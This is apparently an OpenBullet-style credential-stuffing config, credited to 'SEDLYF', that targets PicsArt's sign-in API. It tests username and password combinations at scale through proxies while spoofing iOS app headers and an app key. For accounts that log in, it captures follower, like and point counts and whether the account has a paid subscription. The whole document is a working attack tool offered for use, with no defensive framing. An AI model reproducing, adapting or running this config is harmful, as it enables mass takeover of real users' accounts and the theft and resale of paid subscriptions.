[SETTINGS]
{
  "Name": "PICSART [ SEDLYF ]",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-03-29T18:52:53.444174+05:30",
  "AdditionalInfo": "",
  "Author": "SEDLYF",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.picsart.com/users/signin.json" 
  CONTENT "{\"provider\":\"\",\"username\":\"<USER>\",\"password\":\"<PASS>\",\"appsflyer_id\":\"1606198395109-8926287280794508955\"}" 
  CONTENTTYPE "application/json; charset=UTF-8" 
  HEADER "Host: api.picsart.com" 
  HEADER "accept-encoding: br,gzip" 
  HEADER "device-model: A2217" 
  HEADER "app: com.picsart.studio" 
  HEADER "is-tablet: 0" 
  HEADER "accept: application/picsart-3.0+json" 
  HEADER "country-code: US" 
  HEADER "user-agent: PicsArt-10.x" 
  HEADER "deviceid: 0b76c8dd-7244-4798-b61d-59c9d8e65e78" 
  HEADER "platform: iOS" 
  HEADER "manufacturer: Apple" 
  HEADER "os-version: 7.1.2" 
  HEADER "market: apple" 
  HEADER "low-memory: 0" 
  HEADER "x-api-key: " 
  HEADER "language-code: en" 
  HEADER "apk-key: 7266486dce4251fb48a8ff5fa35ddcaa" 
  HEADER "versioncode: 993815602" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "status\":\"success" 
  KEYCHAIN Failure OR 
    KEY "status\":\"error" 
    KEY "Username or password incorrect" 

PARSE "<USER>" LR "" "" -> VAR "user" 

PARSE "<PASS>" LR "" "" -> VAR "pass" 

IF "<data>" DoesNotContain "is_verified": true"

FUNCTION Constant "False" -> CAP "Email Verified" 

ELSE

PARSE "<data>" JSON "is_verified" CreateEmpty=FALSE -> CAP "Email Verified" 

ENDIF

PARSE "<SOURCE>" JSON "points" CreateEmpty=FALSE -> CAP "Points" 

PARSE "<SOURCE>" JSON "stickers_count" CreateEmpty=FALSE -> CAP "Stickers" 

PARSE "<SOURCE>" JSON "following_count" CreateEmpty=FALSE -> CAP "Following" 

PARSE "<SOURCE>" JSON "followers_count" CreateEmpty=FALSE -> CAP "Followers" 

PARSE "<SOURCE>" JSON "likes_count" CreateEmpty=FALSE -> CAP "Likes" 

PARSE "<SOURCE>" JSON "photos_count" CreateEmpty=FALSE -> CAP "Photos" 

FUNCTION Constant "SEDLYF" -> CAP "Config by" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "shop_subscriptions\":[]" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "shop_subscriptions\":[]" 

